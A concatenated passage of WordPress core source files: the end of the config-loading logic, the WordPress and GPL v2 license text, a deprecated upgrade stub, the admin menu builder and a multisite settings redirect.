'/wp-config.php'; } else { // A config file doesn't exist. define( 'WPINC', 'wp-includes' ); require_once ABSPATH . WPINC . '/version.php'; require_once ABSPATH . WPINC . '/compat.php'; require_once ABSPATH . WPINC . '/load.php'; // Check for the required PHP version and for the MySQL extension or a database drop-in. wp_check_php_mysql_versions(); // Standardize $_SERVER variables across setups. wp_fix_server_vars(); define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' ); require_once ABSPATH . WPINC . '/functions.php'; $path = wp_guess_url() . '/wp-admin/setup-config.php'; // Redirect to setup-config.php. if ( ! str_contains( $_SERVER['REQUEST_URI'], 'setup-config' ) ) { header( 'Location: ' . $path ); exit; } wp_load_translations_early(); // Die with an error message. $die = '<p>' . sprintf( /* translators: %s: wp-config.php */ __( "There doesn't seem to be a %s file. It is needed before the installation can continue." ), '<code>wp-config.php</code>' ) . '</p>'; $die .= '<p>' . sprintf( /* translators: 1: Documentation URL, 2: wp-config.php */ __( 'Need more help? <a href="%1$s">Read the support article on %2$s</a>.' ), __( 'https://developer.wordpress.org/advanced-administration/wordpress/wp-config/' ), '<code>wp-config.php</code>' ) . '</p>'; $die .= '<p>' . sprintf( /* translators: %s: wp-config.php */ __( "You can create a %s file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file." ), '<code>wp-config.php</code>' ) . '</p>'; $die .= '<p><a href="' . $path . '" class="button button-large">' . __( 'Create a Configuration File' ) . '</a></p>'; wp_die( $die, __( 'WordPress › Error' ) ); } WordPress - Web publishing software Copyright 2011-2026 by the contributors This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA This program incorporates work covered by the following copyright and permission notices: b2 is (c) 2001, 2002 Michel Valdrighi - Cafelog Wherever third party code has been used, credit has been given in the code's comments. b2 is released under the GPL and WordPress - Web publishing software Copyright 2003-2010 by the contributors WordPress is released under the GPL =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. WRITTEN OFFER The source code for any program binaries or compressed scripts that are included with WordPress can be freely obtained at the following URL: https://wordpress.org/download/source/ <?php /** * WordPress Upgrade Functions. Old file, must not be used. Include * wp-admin/includes/upgrade.php instead. * * @deprecated 2.5.0 * @package WordPress * @subpackage Administration */ _deprecated_file( basename( __FILE__ ), '2.5.0', 'wp-admin/includes/upgrade.php' ); require_once ABSPATH . 'wp-admin/includes/upgrade.php'; <?php /** * Build Administration Menu. * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * Constructs the admin menu. * * The elements in the array are: * 0: Menu item name. * 1: Minimum level or capability required. * 2: The URL of the item's file. * 3: Page title. * 4: Classes. * 5: ID. * 6: Icon for top level menu. * * @global array $menu */ $menu[2] = array( __( 'Dashboard' ), 'read', 'index.php', '', 'menu-top menu-top-first menu-icon-dashboard', 'menu-dashboard', 'dashicons-dashboard' ); $submenu['index.php'][0] = array( __( 'Home' ), 'read', 'index.php' ); if ( is_multisite() ) { $submenu['index.php'][5] = array( __( 'My Sites' ), 'read', 'my-sites.php' ); } if ( ! is_multisite() || current_user_can( 'update_core' ) ) { $update_data = wp_get_update_data(); } if ( ! is_multisite() ) { if ( current_user_can( 'update_core' ) ) { $capability = 'update_core'; } elseif ( current_user_can( 'update_plugins' ) ) { $capability = 'update_plugins'; } elseif ( current_user_can( 'update_themes' ) ) { $capability = 'update_themes'; } else { $capability = 'update_languages'; } $submenu['index.php'][10] = array( sprintf( /* translators: %s: Number of pending updates. */ __( 'Updates %s' ), sprintf( '<span class="update-plugins count-%s"><span class="update-count">%s</span></span>', $update_data['counts']['total'], number_format_i18n( $update_data['counts']['total'] ) ) ), $capability, 'update-core.php', ); unset( $capability ); } $menu[4] = array( '', 'read', 'separator1', '', 'wp-menu-separator' ); // $menu[5] = Posts. $menu[10] = array( __( 'Media' ), 'upload_files', 'upload.php', '', 'menu-top menu-icon-media', 'menu-media', 'dashicons-admin-media' ); $submenu['upload.php'][5] = array( _x( 'Library', 'media library menu item' ), 'upload_files', 'upload.php' ); $submenu['upload.php'][10] = array( __( 'Add Media File' ), 'upload_files', 'media-new.php' ); $submenu_index = 15; foreach ( get_taxonomies_for_attachments( 'objects' ) as $taxonomy ) { if ( ! $taxonomy->show_ui || ! $taxonomy->show_in_menu ) { continue; } $submenu['upload.php'][ $submenu_index++ ] = array( esc_attr( $taxonomy->labels->menu_name ), $taxonomy->cap->manage_terms, 'edit-tags.php?taxonomy=' . $taxonomy->name . '&post_type=attachment' ); } unset( $taxonomy, $submenu_index ); $menu[15] = array( __( 'Links' ), 'manage_links', 'link-manager.php', '', 'menu-top menu-icon-links', 'menu-links', 'dashicons-admin-links' ); $submenu['link-manager.php'][5] = array( _x( 'All Links', 'admin menu' ), 'manage_links', 'link-manager.php' ); $submenu['link-manager.php'][10] = array( __( 'Add Link' ), 'manage_links', 'link-add.php' ); $submenu['link-manager.php'][15] = array( __( 'Link Categories' ), 'manage_categories', 'edit-tags.php?taxonomy=link_category' ); // $menu[20] = Pages. // Avoid the comment count query for users who cannot edit_posts. if ( current_user_can( 'edit_posts' ) ) { $awaiting_moderation = wp_count_comments(); $awaiting_moderation = $awaiting_moderation->moderated; $awaiting_moderation_i18n = number_format_i18n( $awaiting_moderation ); /* translators: %s: Number of comments. */ $awaiting_moderation_text = sprintf( _n( '%s Comment in moderation', '%s Comments in moderation', $awaiting_moderation ), $awaiting_moderation_i18n ); $menu[25] = array( /* translators: %s: Number of comments. */ sprintf( __( 'Comments %s' ), '<span class="awaiting-mod count-' . absint( $awaiting_moderation ) . '"><span class="pending-count" aria-hidden="true">' . $awaiting_moderation_i18n . '</span><span class="comments-in-moderation-text screen-reader-text">' . $awaiting_moderation_text . '</span></span>' ), 'edit_posts', 'edit-comments.php', '', 'menu-top menu-icon-comments', 'menu-comments', 'dashicons-admin-comments', ); unset( $awaiting_moderation ); } $submenu['edit-comments.php'][0] = array( __( 'All Comments' ), 'edit_posts', 'edit-comments.php' ); $_wp_last_object_menu = 25; // The index of the last top-level menu in the object menu group. $post_types = (array) get_post_types( array( 'show_ui' => true, '_builtin' => false, 'show_in_menu' => true, ) ); $builtin = array( 'post', 'page' ); foreach ( array_merge( $builtin, $post_types ) as $post_type ) { $post_type_obj = get_post_type_object( $post_type ); // Check if it should be a submenu. if ( true !== $post_type_obj->show_in_menu ) { continue; } $post_type_menu_position = is_int( $post_type_obj->menu_position ) ? $post_type_obj->menu_position : ++$_wp_last_object_menu; // If we're to use $_wp_last_object_menu, increment it first. $post_type_for_id = sanitize_html_class( $post_type ); $menu_icon = 'dashicons-admin-post'; if ( is_string( $post_type_obj->menu_icon ) ) { // Special handling for an empty div.wp-menu-image, data:image/svg+xml, and Dashicons. if ( 'none' === $post_type_obj->menu_icon || 'div' === $post_type_obj->menu_icon || str_starts_with( $post_type_obj->menu_icon, 'data:image/svg+xml;base64,' ) || str_starts_with( $post_type_obj->menu_icon, 'dashicons-' ) ) { $menu_icon = $post_type_obj->menu_icon; } else { $menu_icon = esc_url( $post_type_obj->menu_icon ); } } elseif ( in_array( $post_type, $builtin, true ) ) { $menu_icon = 'dashicons-admin-' . $post_type; } $menu_class = 'menu-top menu-icon-' . $post_type_for_id; // 'post' special case. if ( 'post' === $post_type ) { $menu_class .= ' open-if-no-js'; $post_type_file = 'edit.php'; $post_new_file = 'post-new.php'; $edit_tags_file = 'edit-tags.php?taxonomy=%s'; } else { $post_type_file = "edit.php?post_type=$post_type"; $post_new_file = "post-new.php?post_type=$post_type"; $edit_tags_file = "edit-tags.php?taxonomy=%s&post_type=$post_type"; } if ( in_array( $post_type, $builtin, true ) ) { $post_type_menu_id = 'menu-' . $post_type_for_id . 's'; } else { $post_type_menu_id = 'menu-posts-' . $post_type_for_id; } /* * If $post_type_menu_position is already populated or will be populated * by a hard-coded value below, increment the position. */ $core_menu_positions = array( 59, 60, 65, 70, 75, 80, 85, 99 ); while ( isset( $menu[ $post_type_menu_position ] ) || in_array( $post_type_menu_position, $core_menu_positions, true ) ) { ++$post_type_menu_position; } $menu[ $post_type_menu_position ] = array( esc_attr( $post_type_obj->labels->menu_name ), $post_type_obj->cap->edit_posts, $post_type_file, '', $menu_class, $post_type_menu_id, $menu_icon ); $submenu[ $post_type_file ][5] = array( $post_type_obj->labels->all_items, $post_type_obj->cap->edit_posts, $post_type_file ); $submenu[ $post_type_file ][10] = array( $post_type_obj->labels->add_new_item, $post_type_obj->cap->create_posts, $post_new_file ); $submenu_index = 15; foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy ) { if ( ! $taxonomy->show_ui || ! $taxonomy->show_in_menu || ! in_array( $post_type, (array) $taxonomy->object_type, true ) ) { continue; } $submenu[ $post_type_file ][ $submenu_index++ ] = array( esc_attr( $taxonomy->labels->menu_name ), $taxonomy->cap->manage_terms, sprintf( $edit_tags_file, $taxonomy->name ) ); } } unset( $post_type, $post_type_obj, $post_type_for_id, $post_type_menu_position, $menu_icon, $submenu_index, $taxonomy, $post_new_file ); $menu[59] = array( '', 'read', 'separator2', '', 'wp-menu-separator' ); $appearance_capability = current_user_can( 'switch_themes' ) ? 'switch_themes' : 'edit_theme_options'; $menu[60] = array( __( 'Appearance' ), $appearance_capability, 'themes.php', '', 'menu-top menu-icon-appearance', 'menu-appearance', 'dashicons-admin-appearance' ); $count = ''; if ( ! is_multisite() && current_user_can( 'update_themes' ) ) { if ( ! isset( $update_data ) ) { $update_data = wp_get_update_data(); } $count = sprintf( '<span class="update-plugins count-%s"><span class="theme-count">%s</span></span>', $update_data['counts']['themes'], number_format_i18n( $update_data['counts']['themes'] ) ); } /* translators: %s: Number of available theme updates. */ $submenu['themes.php'][5] = array( sprintf( __( 'Themes %s' ), $count ), $appearance_capability, 'themes.php' ); if ( wp_is_block_theme() ) { $submenu['themes.php'][6] = array( _x( 'Editor', 'site editor menu item' ), 'edit_theme_options', 'site-editor.php' ); } else { $supports_stylebook = ( current_theme_supports( 'editor-styles' ) || wp_theme_has_theme_json() ); if ( $supports_stylebook ) { $submenu['themes.php'][6] = array( _x( 'Design', 'design menu item' ), 'edit_theme_options', 'site-editor.php' ); } else { $submenu['themes.php'][6] = array( _x( 'Patterns', 'patterns menu item' ), 'edit_theme_options', 'site-editor.php?p=/pattern' ); } } // Font Library menu item. $submenu['themes.php'][9] = array( __( 'Fonts' ), 'edit_theme_options', 'font-library.php' ); $customize_url = add_query_arg( 'return', urlencode( remove_query_arg( wp_removable_query_args(), wp_unslash( $_SERVER['REQUEST_URI'] ) ) ), 'customize.php' ); // Hide Customize link on block themes unless a plugin or theme // is using 'customize_register' to add a setting. if ( ! wp_is_block_theme() || has_action( 'customize_register' ) ) { $submenu['themes.php'][7] = array( __( 'Customize' ), 'customize', esc_url( $customize_url ), '', 'hide-if-no-customize' ); } if ( current_theme_supports( 'menus' ) || current_theme_supports( 'widgets' ) ) { $submenu['themes.php'][10] = array( __( 'Menus' ), 'edit_theme_options', 'nav-menus.php' ); } if ( current_theme_supports( 'custom-header' ) && current_user_can( 'customize' ) ) { $customize_header_url = add_query_arg( array( 'autofocus' => array( 'control' => 'header_image' ) ), $customize_url ); $submenu['themes.php'][15] = array( _x( 'Header', 'custom image header' ), $appearance_capability, esc_url( $customize_header_url ), '', 'hide-if-no-customize' ); } if ( current_theme_supports( 'custom-background' ) && current_user_can( 'customize' ) ) { $customize_background_url = add_query_arg( array( 'autofocus' => array( 'control' => 'background_image' ) ), $customize_url ); $submenu['themes.php'][20] = array( _x( 'Background', 'custom background' ), $appearance_capability, esc_url( $customize_background_url ), '', 'hide-if-no-customize' ); } unset( $customize_url, $appearance_capability ); // Add 'Theme File Editor' to the bottom of the Appearance (non-block themes) or Tools (block themes) menu. if ( ! is_multisite() ) { // Must use API on the admin_menu hook, direct modification is only possible on/before the _admin_menu hook. add_action( 'admin_menu', '_add_themes_utility_last', 101 ); } /** * Adds the 'Theme File Editor' menu item to the bottom of the Appearance (non-block themes) * or Tools (block themes) menu. * * @access private * @since 3.0.0 * @since 5.9.0 Renamed 'Theme Editor' to 'Theme File Editor'. * Relocates to Tools for block themes. */ function _add_themes_utility_last() { add_submenu_page( wp_is_block_theme() ? 'tools.php' : 'themes.php', __( 'Theme File Editor' ), __( 'Theme File Editor' ), 'edit_themes', 'theme-editor.php' ); } /** * Adds the 'Plugin File Editor' menu item after the 'Themes File Editor' in Tools * for block themes. * * @access private * @since 5.9.0 */ function _add_plugin_file_editor_to_tools() { if ( ! wp_is_block_theme() ) { return; } add_submenu_page( 'tools.php', __( 'Plugin File Editor' ), __( 'Plugin File Editor' ), 'edit_plugins', 'plugin-editor.php' ); } $count = ''; if ( ! is_multisite() && current_user_can( 'update_plugins' ) ) { if ( ! isset( $update_data ) ) { $update_data = wp_get_update_data(); } $count = sprintf( '<span class="update-plugins count-%s"><span class="plugin-count">%s</span></span>', $update_data['counts']['plugins'], number_format_i18n( $update_data['counts']['plugins'] ) ); } /* translators: %s: Number of available plugin updates. */ $menu[65] = array( sprintf( __( 'Plugins %s' ), $count ), 'activate_plugins', 'plugins.php', '', 'menu-top menu-icon-plugins', 'menu-plugins', 'dashicons-admin-plugins' ); $submenu['plugins.php'][5] = array( __( 'Installed Plugins' ), 'activate_plugins', 'plugins.php' ); if ( ! is_multisite() ) { $submenu['plugins.php'][10] = array( __( 'Add Plugin' ), 'install_plugins', 'plugin-install.php' ); if ( wp_is_block_theme() ) { // Place the menu item below the Theme File Editor menu item. add_action( 'admin_menu', '_add_plugin_file_editor_to_tools', 101 ); } else { $submenu['plugins.php'][15] = array( __( 'Plugin File Editor' ), 'edit_plugins', 'plugin-editor.php' ); } } unset( $update_data ); if ( current_user_can( 'list_users' ) ) { $menu[70] = array( __( 'Users' ), 'list_users', 'users.php', '', 'menu-top menu-icon-users', 'menu-users', 'dashicons-admin-users' ); } else { $menu[70] = array( __( 'Profile' ), 'read', 'profile.php', '', 'menu-top menu-icon-users', 'menu-users', 'dashicons-admin-users' ); } if ( current_user_can( 'list_users' ) ) { $_wp_real_parent_file['profile.php'] = 'users.php'; // Back-compat for plugins adding submenus to profile.php. $submenu['users.php'][5] = array( __( 'All Users' ), 'list_users', 'users.php' ); if ( current_user_can( 'create_users' ) ) { $submenu['users.php'][10] = array( __( 'Add User' ), 'create_users', 'user-new.php' ); } elseif ( is_multisite() ) { $submenu['users.php'][10] = array( __( 'Add User' ), 'promote_users', 'user-new.php' ); } $submenu['users.php'][15] = array( __( 'Profile' ), 'read', 'profile.php' ); } else { $_wp_real_parent_file['users.php'] = 'profile.php'; $submenu['profile.php'][5] = array( __( 'Profile' ), 'read', 'profile.php' ); if ( current_user_can( 'create_users' ) ) { $submenu['profile.php'][10] = array( __( 'Add User' ), 'create_users', 'user-new.php' ); } elseif ( is_multisite() ) { $submenu['profile.php'][10] = array( __( 'Add User' ), 'promote_users', 'user-new.php' ); } } $site_health_count = ''; if ( ! is_multisite() && current_user_can( 'view_site_health_checks' ) ) { $get_issues = get_transient( 'health-check-site-status-result' ); $issue_counts = array(); if ( false !== $get_issues ) { $issue_counts = json_decode( $get_issues, true ); } if ( ! is_array( $issue_counts ) || ! $issue_counts ) { $issue_counts = array( 'good' => 0, 'recommended' => 0, 'critical' => 0, ); } $site_health_count = sprintf( '<span class="menu-counter site-health-counter count-%s"><span class="count">%s</span></span>', $issue_counts['critical'], number_format_i18n( $issue_counts['critical'] ) ); } $menu[75] = array( __( 'Tools' ), 'edit_posts', 'tools.php', '', 'menu-top menu-icon-tools', 'menu-tools', 'dashicons-admin-tools' ); $submenu['tools.php'][5] = array( __( 'Available Tools' ), 'edit_posts', 'tools.php' ); $submenu['tools.php'][10] = array( __( 'Import' ), 'import', 'import.php' ); $submenu['tools.php'][15] = array( __( 'Export' ), 'export', 'export.php' ); /* translators: %s: Number of critical Site Health checks. */ $submenu['tools.php'][20] = array( sprintf( __( 'Site Health %s' ), $site_health_count ), 'view_site_health_checks', 'site-health.php' ); $submenu['tools.php'][25] = array( __( 'Export Personal Data' ), 'export_others_personal_data', 'export-personal-data.php' ); $submenu['tools.php'][30] = array( __( 'Erase Personal Data' ), 'erase_others_personal_data', 'erase-personal-data.php' ); if ( is_multisite() && ! is_main_site() && '1' !== get_site()->deleted ) { $submenu['tools.php'][35] = array( __( 'Delete Site' ), 'delete_site', 'ms-delete-site.php' ); } if ( ! is_multisite() && defined( 'WP_ALLOW_MULTISITE' ) && WP_ALLOW_MULTISITE ) { $submenu['tools.php'][50] = array( __( 'Network Setup' ), 'setup_network', 'network.php' ); } $menu[80] = array( __( 'Settings' ), 'manage_options', 'options-general.php', '', 'menu-top menu-icon-settings', 'menu-settings', 'dashicons-admin-settings' ); $submenu['options-general.php'][10] = array( _x( 'General', 'settings screen' ), 'manage_options', 'options-general.php' ); $submenu['options-general.php'][12] = array( __( 'Connectors' ), 'manage_options', 'options-connectors.php' ); $submenu['options-general.php'][15] = array( __( 'Writing' ), 'manage_options', 'options-writing.php' ); $submenu['options-general.php'][20] = array( __( 'Reading' ), 'manage_options', 'options-reading.php' ); $submenu['options-general.php'][25] = array( __( 'Discussion' ), 'manage_options', 'options-discussion.php' ); $submenu['options-general.php'][30] = array( __( 'Media' ), 'manage_options', 'options-media.php' ); $submenu['options-general.php'][40] = array( __( 'Permalinks' ), 'manage_options', 'options-permalink.php' ); $submenu['options-general.php'][45] = array( __( 'Privacy' ), 'manage_privacy_options', 'options-privacy.php' ); $_wp_last_utility_menu = 80; // The index of the last top-level menu in the utility menu group. $menu[99] = array( '', 'read', 'separator-last', '', 'wp-menu-separator' ); // Back-compat for old top-levels. $_wp_real_parent_file['post.php'] = 'edit.php'; $_wp_real_parent_file['post-new.php'] = 'edit.php'; $_wp_real_parent_file['edit-pages.php'] = 'edit.php?post_type=page'; $_wp_real_parent_file['page-new.php'] = 'edit.php?post_type=page'; $_wp_real_parent_file['wpmu-admin.php'] = 'tools.php'; $_wp_real_parent_file['ms-admin.php'] = 'tools.php'; // Ensure backward compatibility. $compat = array( 'index' => 'dashboard', 'edit' => 'posts', 'post' => 'posts', 'upload' => 'media', 'link-manager' => 'links', 'edit-pages' => 'pages', 'page' => 'pages', 'edit-comments' => 'comments', 'options-general' => 'settings', 'themes' => 'appearance', ); require_once ABSPATH . 'wp-admin/includes/menu.php'; <?php /** * Multisite network settings administration panel. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ require_once __DIR__ . '/admin.php'; wp_redirect( network_admin_url( 'settings.php' ) ); exit; <?php /** * Permalink Settings Administration Screen. * * 